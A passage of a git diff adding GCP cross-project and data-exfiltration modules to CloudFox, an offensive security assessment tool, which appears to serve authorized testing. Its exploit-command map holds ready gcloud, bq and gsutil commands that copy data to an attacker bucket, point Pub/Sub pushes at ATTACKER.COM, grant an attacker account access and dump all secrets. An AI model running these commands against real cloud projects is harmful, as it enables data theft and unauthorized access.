a target project +func (m *CrossProjectModule) getAttackPathForTarget(targetProject, principal string) string { + // Clean principal for lookup + cleanedPrincipal := cleanPrincipal(principal) + + // Check if this is a service account + if strings.Contains(cleanedPrincipal, "@") && strings.Contains(cleanedPrincipal, ".iam.gserviceaccount.com") { + return gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, cleanedPrincipal) + } + + return "-" +} + +func (m *CrossProjectModule) collectLootFiles() []internal.LootFile { + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper 
authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + return lootFiles +} + +// buildTableBodyByTargetProject builds table bodies grouped by target project +// Returns a map of targetProjectID -> [][]string (rows for that target project) +func (m *CrossProjectModule) buildTableBodyByTargetProject() map[string][][]string { + bodyByProject := make(map[string][][]string) + + // Add cross-project bindings + for _, binding := range m.CrossBindings { + principalType := getPrincipalTypeDisplay(binding.Principal) + principal := cleanPrincipal(binding.Principal) + role := cleanRole(binding.Role) + attackPath := m.getAttackPathForTarget(binding.TargetProject, binding.Principal) + targetType, targetPrincipal := m.getImpersonationTarget(binding.Principal, binding.Role, binding.TargetProject) + trustBoundary := m.getTargetProjectScope(binding.TargetProject) + + row := []string{ + m.GetProjectName(binding.SourceProject), + principalType, + principal, + "IAM Binding", + m.GetProjectName(binding.TargetProject), + targetType, + targetPrincipal, + role, + attackPath, + trustBoundary, + } + bodyByProject[binding.TargetProject] = append(bodyByProject[binding.TargetProject], row) + } + + // Add cross-project service accounts + for _, sa := range m.CrossProjectSAs { + for _, access := range sa.TargetAccess { + parts := strings.SplitN(access, ": ", 2) + targetProject := "" + role := access + if len(parts) == 2 { + targetProject = parts[0] + role = parts[1] + } + + role = cleanRole(role) + attackPath := m.getAttackPathForTarget(targetProject, "serviceAccount:"+sa.Email) + targetType, targetPrincipal := m.getImpersonationTarget(sa.Email, role, targetProject) + trustBoundary := m.getTargetProjectScope(targetProject) + + row := []string{ + m.GetProjectName(sa.ProjectID), + "Service Account", + sa.Email, + "IAM Binding", + m.GetProjectName(targetProject), + targetType, + targetPrincipal, + role, + attackPath, + trustBoundary, + } + bodyByProject[targetProject] = 
append(bodyByProject[targetProject], row) + } + } + + // Add lateral movement paths + for _, path := range m.LateralMovementPaths { + for _, role := range path.TargetRoles { + principalType := getPrincipalTypeDisplay(path.SourcePrincipal) + principal := cleanPrincipal(path.SourcePrincipal) + cleanedRole := cleanRole(role) + attackPath := m.getAttackPathForTarget(path.TargetProject, path.SourcePrincipal) + targetType, targetPrincipal := m.getImpersonationTarget(path.SourcePrincipal, role, path.TargetProject) + trustBoundary := m.getTargetProjectScope(path.TargetProject) + + row := []string{ + m.GetProjectName(path.SourceProject), + principalType, + principal, + path.AccessMethod, + m.GetProjectName(path.TargetProject), + targetType, + targetPrincipal, + cleanedRole, + attackPath, + trustBoundary, + } + bodyByProject[path.TargetProject] = append(bodyByProject[path.TargetProject], row) + } + } + + // Add logging sinks - these are resources, not principals + for _, sink := range m.CrossProjectSinks { + dest := sink.DestinationType + if sink.Filter != "" { + filter := sink.Filter + if len(filter) > 30 { + filter = filter[:27] + "..." 
+ } + dest = fmt.Sprintf("%s (%s)", sink.DestinationType, filter) + } + trustBoundary := m.getTargetProjectScope(sink.TargetProject) + + row := []string{ + m.GetProjectName(sink.SourceProject), + "Logging Sink", + sink.SinkName, + "Data Export", + m.GetProjectName(sink.TargetProject), + "-", + "-", + dest, + "-", + trustBoundary, + } + bodyByProject[sink.TargetProject] = append(bodyByProject[sink.TargetProject], row) + } + + // Add Pub/Sub exports - these are resources, not principals + for _, export := range m.CrossProjectPubSub { + dest := export.ExportType + if export.ExportDest != "" { + destName := extractCrossProjectResourceName(export.ExportDest) + dest = fmt.Sprintf("%s: %s", export.ExportType, destName) + } + trustBoundary := m.getTargetProjectScope(export.TargetProject) + + row := []string{ + m.GetProjectName(export.SourceProject), + "Pub/Sub", + export.SubscriptionName, + "Data Export", + m.GetProjectName(export.TargetProject), + "-", + "-", + dest, + "-", + trustBoundary, + } + bodyByProject[export.TargetProject] = append(bodyByProject[export.TargetProject], row) + } + + return bodyByProject +} + +func (m *CrossProjectModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + // For crossproject, output at project level grouped by TARGET project + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + header := m.getHeader() + bodyByProject := m.buildTableBodyByTargetProject() + lootFiles := m.collectLootFiles() + + // Create output for each target project + for targetProject, body := range bodyByProject { + if len(body) == 0 { + continue + } + + tables := []internal.TableFile{ + { + Name: "crossproject", + Header: header, + Body: body, + }, + } + + output := CrossProjectOutput{ + Table: tables, + Loot: lootFiles, // Loot files are shared across all projects + } + + outputData.ProjectLevelData[targetProject] = 
output + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_CROSSPROJECT_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +func (m *CrossProjectModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + header := m.getHeader() + bodyByProject := m.buildTableBodyByTargetProject() + lootFiles := m.collectLootFiles() + + // Write output for each target project separately + isFirstProject := true + for targetProject, body := range bodyByProject { + if len(body) == 0 { + continue + } + + tables := []internal.TableFile{ + { + Name: "crossproject", + Header: header, + Body: body, + }, + } + + // Only include loot files on the first project to avoid duplicate writes + var projectLoot []internal.LootFile + if isFirstProject { + projectLoot = lootFiles + isFirstProject = false + } + + output := CrossProjectOutput{ + Table: tables, + Loot: projectLoot, + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + []string{targetProject}, + []string{m.GetProjectName(targetProject)}, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output for project %s: %v", targetProject, err), globals.GCP_CROSSPROJECT_MODULE_NAME) + m.CommandCounter.Error++ + } + } +} diff --git a/gcp/commands/dataexfiltration.go b/gcp/commands/dataexfiltration.go new file mode 100755 index 00000000..3475c8db --- /dev/null +++ b/gcp/commands/dataexfiltration.go @@ -0,0 +1,1710 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + bigqueryservice "github.com/BishopFox/cloudfox/gcp/services/bigqueryService" + foxmapperservice "github.com/BishopFox/cloudfox/gcp/services/foxmapperService" + loggingservice 
"github.com/BishopFox/cloudfox/gcp/services/loggingService" + orgpolicyservice "github.com/BishopFox/cloudfox/gcp/services/orgpolicyService" + pubsubservice "github.com/BishopFox/cloudfox/gcp/services/pubsubService" + vpcscservice "github.com/BishopFox/cloudfox/gcp/services/vpcscService" + "github.com/BishopFox/cloudfox/gcp/shared" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + compute "google.golang.org/api/compute/v1" + sqladmin "google.golang.org/api/sqladmin/v1" + storage "google.golang.org/api/storage/v1" + storagetransfer "google.golang.org/api/storagetransfer/v1" +) + +// Module name constant +const GCP_DATAEXFILTRATION_MODULE_NAME string = "data-exfiltration" + +var GCPDataExfiltrationCommand = &cobra.Command{ + Use: GCP_DATAEXFILTRATION_MODULE_NAME, + Aliases: []string{"exfil", "data-exfil", "exfiltration"}, + Short: "Identify data exfiltration paths and high-risk data exposure", + Long: `Identify data exfiltration vectors and paths in GCP environments. + +This module identifies both ACTUAL misconfigurations and POTENTIAL exfiltration vectors +using FoxMapper graph data for permission analysis. 
+ +Actual Findings (specific resources): +- Public snapshots and images (actual IAM policy check) +- Public buckets (actual IAM policy check) +- Cross-project logging sinks (actual sink enumeration) +- Pub/Sub push subscriptions to external endpoints +- BigQuery datasets with public IAM bindings +- Storage Transfer Service jobs to external destinations + +Permission-Based Vectors (from FoxMapper graph): +- Storage objects read/list permissions +- BigQuery data access and export permissions +- Cloud SQL export and connect permissions +- Secret Manager access permissions +- KMS decrypt permissions +- Logging read permissions + +Prerequisites: +- Run 'foxmapper gcp graph create' for permission-based analysis + +Security Controls Checked: +- VPC Service Controls (VPC-SC) perimeter protection +- Organization policies for data protection + +The loot file includes commands to perform each type of exfiltration.`, + Run: runGCPDataExfiltrationCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +// ExfiltrationPath represents an actual misconfiguration or finding +type ExfiltrationPath struct { + PathType string // Category of exfiltration + ResourceName string // Specific resource + ProjectID string // Source project + Description string // What the path enables + Destination string // Where data can go + RiskLevel string // CRITICAL, HIGH, MEDIUM, LOW + RiskReasons []string // Why this is risky + ExploitCommand string // Command to exploit + VPCSCProtected bool // Is this project protected by VPC-SC? 
+} + +type PublicExport struct { + ResourceType string + ResourceName string + ProjectID string + AccessLevel string // "allUsers", "allAuthenticatedUsers" + DataType string + Size string + RiskLevel string +} + +// OrgPolicyProtection tracks which org policies protect a project from data exfiltration +type OrgPolicyProtection struct { + ProjectID string + PublicAccessPrevention bool // storage.publicAccessPrevention enforced + DomainRestriction bool // iam.allowedPolicyMemberDomains enforced + SQLPublicIPRestriction bool // sql.restrictPublicIp enforced + ResourceLocationRestriction bool // gcp.resourceLocations enforced + CloudFunctionsVPCConnector bool // cloudfunctions.requireVPCConnector enforced + CloudRunIngressRestriction bool // run.allowedIngress enforced + CloudRunRequireIAMInvoker bool // run.allowedIngress = internal or internal-and-cloud-load-balancing + DisableBQOmniAWS bool // bigquery.disableBQOmniAWS enforced + DisableBQOmniAzure bool // bigquery.disableBQOmniAzure enforced + MissingProtections []string +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type DataExfiltrationModule struct { + gcpinternal.BaseGCPModule + + ProjectExfiltrationPaths map[string][]ExfiltrationPath // projectID -> paths + ProjectPublicExports map[string][]PublicExport // projectID -> exports + FoxMapperFindings []foxmapperservice.DataExfilFinding // FoxMapper-based findings + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex + vpcscProtectedProj map[string]bool // Projects protected by VPC-SC + orgPolicyProtection map[string]*OrgPolicyProtection // Org policy protections per project + FoxMapperCache *gcpinternal.FoxMapperCache // FoxMapper cache for unified data access + OrgCache *gcpinternal.OrgCache // OrgCache for ancestry lookups +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type DataExfiltrationOutput struct { + Table 
[]internal.TableFile + Loot []internal.LootFile +} + +func (o DataExfiltrationOutput) TableFiles() []internal.TableFile { return o.Table } +func (o DataExfiltrationOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPDataExfiltrationCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_DATAEXFILTRATION_MODULE_NAME) + if err != nil { + return + } + + module := &DataExfiltrationModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectExfiltrationPaths: make(map[string][]ExfiltrationPath), + ProjectPublicExports: make(map[string][]PublicExport), + FoxMapperFindings: []foxmapperservice.DataExfilFinding{}, + LootMap: make(map[string]map[string]*internal.LootFile), + vpcscProtectedProj: make(map[string]bool), + orgPolicyProtection: make(map[string]*OrgPolicyProtection), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *DataExfiltrationModule) getAllExfiltrationPaths() []ExfiltrationPath { + var all []ExfiltrationPath + for _, paths := range m.ProjectExfiltrationPaths { + all = append(all, paths...) + } + return all +} + +func (m *DataExfiltrationModule) getAllPublicExports() []PublicExport { + var all []PublicExport + for _, exports := range m.ProjectPublicExports { + all = append(all, exports...) + } + return all +} + +// filterFindingsByProjects filters FoxMapper findings to only include principals +// from the specified projects (via -p or -l flags) OR principals without a clear project +// (users, groups, compute default SAs, etc.) 
+func (m *DataExfiltrationModule) filterFindingsByProjects(findings []foxmapperservice.DataExfilFinding) []foxmapperservice.DataExfilFinding { + // Build a set of specified project IDs for fast lookup + specifiedProjects := make(map[string]bool) + for _, projectID := range m.ProjectIDs { + specifiedProjects[projectID] = true + } + + var filtered []foxmapperservice.DataExfilFinding + + for _, finding := range findings { + // Filter principals to only those from specified projects OR without a clear project + var filteredPrincipals []foxmapperservice.PrincipalAccess + for _, p := range finding.Principals { + principalProject := extractProjectFromPrincipal(p.Principal, m.OrgCache) + // Include if: + // 1. Principal's project is in our specified list, OR + // 2. Principal has no clear project (users, groups, compute default SAs) + if specifiedProjects[principalProject] || principalProject == "" { + filteredPrincipals = append(filteredPrincipals, p) + } + } + + // Only include the finding if it has matching principals + if len(filteredPrincipals) > 0 { + filteredFinding := finding + filteredFinding.Principals = filteredPrincipals + filtered = append(filtered, filteredFinding) + } + } + + return filtered +} + +// countFindingsByProject returns a count of findings per project for debugging +func (m *DataExfiltrationModule) countFindingsByProject() map[string]int { + counts := make(map[string]int) + for _, f := range m.FoxMapperFindings { + for _, p := range f.Principals { + proj := extractProjectFromPrincipal(p.Principal, m.OrgCache) + if proj == "" { + proj = "(unknown)" + } + counts[proj]++ + } + } + return counts +} + +func (m *DataExfiltrationModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Identifying data exfiltration paths and potential vectors...", GCP_DATAEXFILTRATION_MODULE_NAME) + + // Load OrgCache for ancestry lookups (needed for per-project filtering) + m.OrgCache = gcpinternal.GetOrgCacheFromContext(ctx) + if m.OrgCache == nil 
|| !m.OrgCache.IsPopulated() { + diskCache, _, err := gcpinternal.LoadOrgCacheFromFile(m.OutputDirectory, m.Account) + if err == nil && diskCache != nil && diskCache.IsPopulated() { + m.OrgCache = diskCache + } + } + + // Get FoxMapper cache from context or try to load it + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + if m.FoxMapperCache == nil || !m.FoxMapperCache.IsPopulated() { + // Try to load FoxMapper data (org from hierarchy if available) + orgID := "" + if m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { + orgID = m.Hierarchy.Organizations[0].ID + } + m.FoxMapperCache = gcpinternal.TryLoadFoxMapper(orgID, m.ProjectIDs) + } + + // First, check VPC-SC protection status for all projects + m.checkVPCSCProtection(ctx, logger) + + // Check organization policy protections for all projects + m.checkOrgPolicyProtection(ctx, logger) + + // Process each project for actual misconfigurations + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, GCP_DATAEXFILTRATION_MODULE_NAME, m.processProject) + + // Analyze permission-based exfiltration using FoxMapper + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + logger.InfoM("Analyzing permission-based exfiltration paths using FoxMapper...", GCP_DATAEXFILTRATION_MODULE_NAME) + svc := m.FoxMapperCache.GetService() + allFindings := svc.AnalyzeDataExfil("") + + // Filter findings to only include principals from specified projects + m.FoxMapperFindings = m.filterFindingsByProjects(allFindings) + + if len(m.FoxMapperFindings) > 0 { + logger.InfoM(fmt.Sprintf("Found %d permission-based exfiltration techniques with access", len(m.FoxMapperFindings)), GCP_DATAEXFILTRATION_MODULE_NAME) + + // Log findings per project for debugging + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + counts := m.countFindingsByProject() + for proj, count := range counts { + logger.InfoM(fmt.Sprintf(" - %s: %d principals", proj, count), GCP_DATAEXFILTRATION_MODULE_NAME) + } + } + } + } else { + 
logger.InfoM("No FoxMapper data found - skipping permission-based analysis. Run 'foxmapper gcp graph create' for full analysis.", GCP_DATAEXFILTRATION_MODULE_NAME) + } + + allPaths := m.getAllExfiltrationPaths() + + // Check results + hasResults := len(allPaths) > 0 || len(m.FoxMapperFindings) > 0 + + if !hasResults { + logger.InfoM("No data exfiltration paths found", GCP_DATAEXFILTRATION_MODULE_NAME) + return + } + + if len(allPaths) > 0 { + logger.SuccessM(fmt.Sprintf("Found %d actual misconfiguration(s)", len(allPaths)), GCP_DATAEXFILTRATION_MODULE_NAME) + } + if len(m.FoxMapperFindings) > 0 { + logger.SuccessM(fmt.Sprintf("Found %d permission-based exfiltration technique(s) with access", len(m.FoxMapperFindings)), GCP_DATAEXFILTRATION_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// VPC-SC Protection Check +// ------------------------------ +func (m *DataExfiltrationModule) checkVPCSCProtection(ctx context.Context, logger internal.Logger) { + vpcsc := vpcscservice.New() + + if len(m.ProjectIDs) == 0 { + return + } + + policies, err := vpcsc.ListAccessPolicies("") + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM("Could not check VPC-SC policies (may require org-level access)", GCP_DATAEXFILTRATION_MODULE_NAME) + } + return + } + + for _, policy := range policies { + perimeters, err := vpcsc.ListServicePerimeters(policy.Name) + if err != nil { + continue + } + + for _, perimeter := range perimeters { + for _, resource := range perimeter.Resources { + projectNum := strings.TrimPrefix(resource, "projects/") + m.mu.Lock() + m.vpcscProtectedProj[projectNum] = true + m.mu.Unlock() + } + } + } +} + +// ------------------------------ +// Organization Policy Protection Check +// ------------------------------ +func (m *DataExfiltrationModule) checkOrgPolicyProtection(ctx context.Context, logger internal.Logger) { + orgSvc := orgpolicyservice.New() + + for _, projectID := range 
m.ProjectIDs { + protection := &OrgPolicyProtection{ + ProjectID: projectID, + MissingProtections: []string{}, + } + + policies, err := orgSvc.ListProjectPolicies(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Could not check org policies for %s: %v", projectID, err), GCP_DATAEXFILTRATION_MODULE_NAME) + } + m.mu.Lock() + m.orgPolicyProtection[projectID] = protection + m.mu.Unlock() + continue + } + + for _, policy := range policies { + switch policy.Constraint { + case "constraints/storage.publicAccessPrevention": + if policy.Enforced { + protection.PublicAccessPrevention = true + } + case "constraints/iam.allowedPolicyMemberDomains": + if policy.Enforced || len(policy.AllowedValues) > 0 { + protection.DomainRestriction = true + } + case "constraints/sql.restrictPublicIp": + if policy.Enforced { + protection.SQLPublicIPRestriction = true + } + case "constraints/gcp.resourceLocations": + if policy.Enforced || len(policy.AllowedValues) > 0 { + protection.ResourceLocationRestriction = true + } + case "constraints/cloudfunctions.requireVPCConnector": + if policy.Enforced { + protection.CloudFunctionsVPCConnector = true + } + case "constraints/run.allowedIngress": + if len(policy.AllowedValues) > 0 { + for _, val := range policy.AllowedValues { + if val == "internal" || val == "internal-and-cloud-load-balancing" { + protection.CloudRunIngressRestriction = true + break + } + } + } + case "constraints/bigquery.disableBQOmniAWS": + if policy.Enforced { + protection.DisableBQOmniAWS = true + } + case "constraints/bigquery.disableBQOmniAzure": + if policy.Enforced { + protection.DisableBQOmniAzure = true + } + } + } + + // Identify missing protections + if !protection.PublicAccessPrevention { + protection.MissingProtections = append(protection.MissingProtections, "storage.publicAccessPrevention not enforced") + } + if !protection.DomainRestriction { + protection.MissingProtections = 
append(protection.MissingProtections, "iam.allowedPolicyMemberDomains not configured") + } + if !protection.SQLPublicIPRestriction { + protection.MissingProtections = append(protection.MissingProtections, "sql.restrictPublicIp not enforced") + } + if !protection.CloudFunctionsVPCConnector { + protection.MissingProtections = append(protection.MissingProtections, "cloudfunctions.requireVPCConnector not enforced") + } + if !protection.CloudRunIngressRestriction { + protection.MissingProtections = append(protection.MissingProtections, "run.allowedIngress not restricted") + } + if !protection.DisableBQOmniAWS { + protection.MissingProtections = append(protection.MissingProtections, "bigquery.disableBQOmniAWS not enforced") + } + if !protection.DisableBQOmniAzure { + protection.MissingProtections = append(protection.MissingProtections, "bigquery.disableBQOmniAzure not enforced") + } + + m.mu.Lock() + m.orgPolicyProtection[projectID] = protection + m.mu.Unlock() + } +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *DataExfiltrationModule) initializeLootForProject(projectID string) { + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["data-exfiltration-commands"] = &internal.LootFile{ + Name: "data-exfiltration-commands", + Contents: "# Data Exfiltration Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } +} + +// getExploitCommand returns specific exploitation commands for a permission +func getExploitCommand(permission, principal, project string) string { + // Map permissions to specific gcloud/gsutil commands + commands := map[string]string{ + // Storage + "storage.objects.get": "gsutil cp gs://BUCKET/OBJECT ./\ngcloud storage cp gs://BUCKET/OBJECT ./", + "storage.objects.list": "gsutil ls -r gs://BUCKET/\ngcloud storage ls --recursive gs://BUCKET/", + "storage.buckets.setIamPolicy": "gsutil iam ch 
allUsers:objectViewer gs://BUCKET\n# Or grant yourself access:\ngsutil iam ch user:ATTACKER@EMAIL:objectAdmin gs://BUCKET", + "storage.hmacKeys.create": "gsutil hmac create SERVICE_ACCOUNT_EMAIL", + + // IAM / Service Account Impersonation + "iam.serviceAccounts.signBlob": "gcloud iam service-accounts sign-blob --iam-account=TARGET_SA input.txt output.sig", + "iam.serviceAccountKeys.create": "gcloud iam service-accounts keys create key.json --iam-account=TARGET_SA", + "iam.serviceAccounts.getAccessToken": "gcloud auth print-access-token --impersonate-service-account=TARGET_SA", + + // Storage Transfer + "storagetransfer.jobs.create": "# Create transfer job to exfil bucket to external destination\ngcloud transfer jobs create gs://SOURCE_BUCKET gs://ATTACKER_BUCKET --name=exfil-job", + "storagetransfer.jobs.update": "# Update existing transfer job destination\ngcloud transfer jobs update JOB_NAME --destination=gs://ATTACKER_BUCKET", + "storagetransfer.jobs.run": "gcloud transfer jobs run JOB_NAME", + + // BigQuery + "bigquery.tables.export": "bq extract --destination_format=CSV PROJECT:DATASET.TABLE gs://BUCKET/export.csv", + "bigquery.tables.getData": "bq query --use_legacy_sql=false 'SELECT * FROM `PROJECT.DATASET.TABLE` LIMIT 1000'", + "bigquery.jobs.create": "bq query --use_legacy_sql=false 'SELECT * FROM `PROJECT.DATASET.TABLE`'\nbq extract PROJECT:DATASET.TABLE gs://BUCKET/export.csv", + "bigquery.datasets.setIamPolicy": "bq add-iam-policy-binding --member=user:ATTACKER@EMAIL --role=roles/bigquery.dataViewer PROJECT:DATASET", + + // Cloud SQL + "cloudsql.instances.export": "gcloud sql export sql INSTANCE gs://BUCKET/export.sql --database=DATABASE", + "cloudsql.backupRuns.create": "gcloud sql backups create --instance=INSTANCE", + "cloudsql.instances.connect": "gcloud sql connect INSTANCE --user=USER --database=DATABASE", + "cloudsql.users.create": "gcloud sql users create ATTACKER --instance=INSTANCE --password=PASSWORD", + + // Spanner + 
"spanner.databases.export": "gcloud spanner databases export DATABASE --instance=INSTANCE --destination-uri=gs://BUCKET/spanner-export/", + "spanner.databases.read": "gcloud spanner databases execute-sql DATABASE --instance=INSTANCE --sql='SELECT * FROM TABLE_NAME'", + "spanner.backups.create": "gcloud spanner backups create BACKUP --instance=INSTANCE --database=DATABASE --retention-period=7d", + + // Datastore / Firestore + "datastore.databases.export": "gcloud datastore export gs://BUCKET/datastore-export/ --namespaces='(default)'", + "datastore.entities.get": "gcloud datastore export gs://BUCKET/datastore-export/", + + // Bigtable + "bigtable.tables.readRows": "cbt -project=PROJECT -instance=INSTANCE read TABLE", + "bigtable.backups.create": "cbt -project=PROJECT -instance=INSTANCE createbackup CLUSTER BACKUP TABLE", + + // Pub/Sub + "pubsub.subscriptions.create": "gcloud pubsub subscriptions create ATTACKER_SUB --topic=TOPIC\ngcloud pubsub subscriptions pull ATTACKER_SUB --auto-ack --limit=100", + "pubsub.subscriptions.consume": "gcloud pubsub subscriptions pull SUBSCRIPTION --auto-ack --limit=100", + "pubsub.subscriptions.update": "gcloud pubsub subscriptions update SUBSCRIPTION --push-endpoint=https://ATTACKER.COM/webhook", + + // Compute + "compute.snapshots.create": "gcloud compute snapshots create SNAPSHOT_NAME --source-disk=DISK_NAME --source-disk-zone=ZONE", + "compute.disks.createSnapshot": "gcloud compute disks snapshot DISK_NAME --zone=ZONE --snapshot-names=SNAPSHOT_NAME", + "compute.images.create": "gcloud compute images create IMAGE_NAME --source-disk=DISK_NAME --source-disk-zone=ZONE", + "compute.machineImages.create": "gcloud compute machine-images create IMAGE_NAME --source-instance=INSTANCE --source-instance-zone=ZONE", + "compute.images.setIamPolicy": "gcloud compute images add-iam-policy-binding IMAGE --member=user:ATTACKER@EMAIL --role=roles/compute.imageUser", + "compute.snapshots.setIamPolicy": "gcloud compute snapshots 
add-iam-policy-binding SNAPSHOT --member=user:ATTACKER@EMAIL --role=roles/compute.storageAdmin", + + // Logging + "logging.sinks.create": "gcloud logging sinks create SINK_NAME storage.googleapis.com/ATTACKER_BUCKET --log-filter='resource.type=\"gce_instance\"'", + "logging.sinks.update": "gcloud logging sinks update SINK_NAME --destination=storage.googleapis.com/ATTACKER_BUCKET", + "logging.logEntries.list": "gcloud logging read 'resource.type=\"gce_instance\"' --limit=1000 --format=json > logs.json", + + // Secret Manager + "secretmanager.versions.access": "gcloud secrets versions access latest --secret=SECRET_NAME", + "secretmanager.secrets.list": "gcloud secrets list --format='value(name)'\n# Then access each secret:\nfor secret in $(gcloud secrets list --format='value(name)'); do gcloud secrets versions access latest --secret=$secret; done", + + // KMS + "cloudkms.cryptoKeyVersions.useToDecrypt": "gcloud kms decrypt --key=KEY_NAME --keyring=KEYRING --location=LOCATION --ciphertext-file=encrypted.bin --plaintext-file=decrypted.txt", + "cloudkms.cryptoKeys.setIamPolicy": "gcloud kms keys add-iam-policy-binding KEY_NAME --keyring=KEYRING --location=LOCATION --member=user:ATTACKER@EMAIL --role=roles/cloudkms.cryptoKeyDecrypter", + + // Artifact Registry + "artifactregistry.repositories.downloadArtifacts": "gcloud artifacts docker images list LOCATION-docker.pkg.dev/PROJECT/REPO\ndocker pull LOCATION-docker.pkg.dev/PROJECT/REPO/IMAGE:TAG", + "artifactregistry.repositories.setIamPolicy": "gcloud artifacts repositories add-iam-policy-binding REPO --location=LOCATION --member=user:ATTACKER@EMAIL --role=roles/artifactregistry.reader", + + // Cloud Functions + "cloudfunctions.functions.get": "gcloud functions describe FUNCTION_NAME --region=REGION", + "cloudfunctions.functions.sourceCodeGet": "gcloud functions describe FUNCTION_NAME --region=REGION --format='value(sourceArchiveUrl)'\ngsutil cp SOURCE_URL ./function-source.zip", + + // Cloud Run + "run.services.get": 
"gcloud run services describe SERVICE --region=REGION --format=yaml", + + // Dataproc + "dataproc.jobs.create": "gcloud dataproc jobs submit spark --cluster=CLUSTER --region=REGION --class=org.example.ExfilJob --jars=gs://ATTACKER_BUCKET/exfil.jar", + + // Dataflow + "dataflow.jobs.create": "gcloud dataflow jobs run exfil-job --gcs-location=gs://dataflow-templates/latest/GCS_to_GCS --region=REGION --parameters inputDirectory=gs://SOURCE_BUCKET,outputDirectory=gs://ATTACKER_BUCKET", + + // Redis + "redis.instances.export": "gcloud redis instances export gs://BUCKET/redis-export.rdb --instance=INSTANCE --region=REGION", + + // AlloyDB + "alloydb.backups.create": "gcloud alloydb backups create BACKUP --cluster=CLUSTER --region=REGION", + + // Source Repos + "source.repos.get": "gcloud source repos clone REPO_NAME\ncd REPO_NAME && git log --all", + + // Healthcare API + "healthcare.fhirResources.get": "curl -H \"Authorization: Bearer $(gcloud auth print-access-token)\" \"https://healthcare.googleapis.com/v1/projects/PROJECT/locations/LOCATION/datasets/DATASET/fhirStores/STORE/fhir/Patient\"", + "healthcare.dicomStores.dicomWebRetrieve": "curl -H \"Authorization: Bearer $(gcloud auth print-access-token)\" \"https://healthcare.googleapis.com/v1/projects/PROJECT/locations/LOCATION/datasets/DATASET/dicomStores/STORE/dicomWeb/studies\"", + "healthcare.datasets.export": "gcloud healthcare datasets export DATASET --location=LOCATION --destination-uri=gs://BUCKET/healthcare-export/", + } + + cmd, ok := commands[permission] + if !ok { + return fmt.Sprintf("# No specific command for %s - check gcloud documentation", permission) + } + + // Replace placeholders with actual values where possible + if project != "" && project != "-" { + cmd = strings.ReplaceAll(cmd, "PROJECT", project) + } + + return cmd +} + +// generatePlaybookForProject generates a loot file specific to a project +// It includes SAs from that project + users/groups (which apply to all projects) +func (m 
*DataExfiltrationModule) generatePlaybookForProject(projectID string) *internal.LootFile { + var sb strings.Builder + sb.WriteString("# GCP Data Exfiltration Commands\n") + sb.WriteString(fmt.Sprintf("# Project: %s\n", projectID)) + sb.WriteString("# Generated by CloudFox\n") + sb.WriteString("# WARNING: Only use with proper authorization\n\n") + + // Actual misconfigurations for this project + paths := m.ProjectExfiltrationPaths[projectID] + if len(paths) > 0 { + sb.WriteString("# === ACTUAL MISCONFIGURATIONS ===\n\n") + for _, path := range paths { + sb.WriteString(fmt.Sprintf("# =============================================================================\n"+ + "# %s: %s\n"+ + "# =============================================================================\n", path.PathType, path.ResourceName)) + sb.WriteString(fmt.Sprintf("# Description: %s\n", path.Description)) + if path.ExploitCommand != "" { + sb.WriteString(path.ExploitCommand) + sb.WriteString("\n\n") + } + } + } + + // Permission-based findings from FoxMapper - filter to this project's principals + users/groups + if len(m.FoxMapperFindings) > 0 { + hasFindings := false + + for _, finding := range m.FoxMapperFindings { + var relevantPrincipals []foxmapperservice.PrincipalAccess + + for _, p := range finding.Principals { + principalProject := extractProjectFromPrincipal(p.Principal, m.OrgCache) + // Include if: SA from this project OR user/group (no project) + if principalProject == projectID || principalProject == "" { + relevantPrincipals = append(relevantPrincipals, p) + } + } + + if len(relevantPrincipals) == 0 { + continue + } + + if !hasFindings { + sb.WriteString("# === PERMISSION-BASED EXFILTRATION COMMANDS ===\n\n") + hasFindings = true + } + + sb.WriteString(fmt.Sprintf("# =============================================================================\n"+ + "# %s 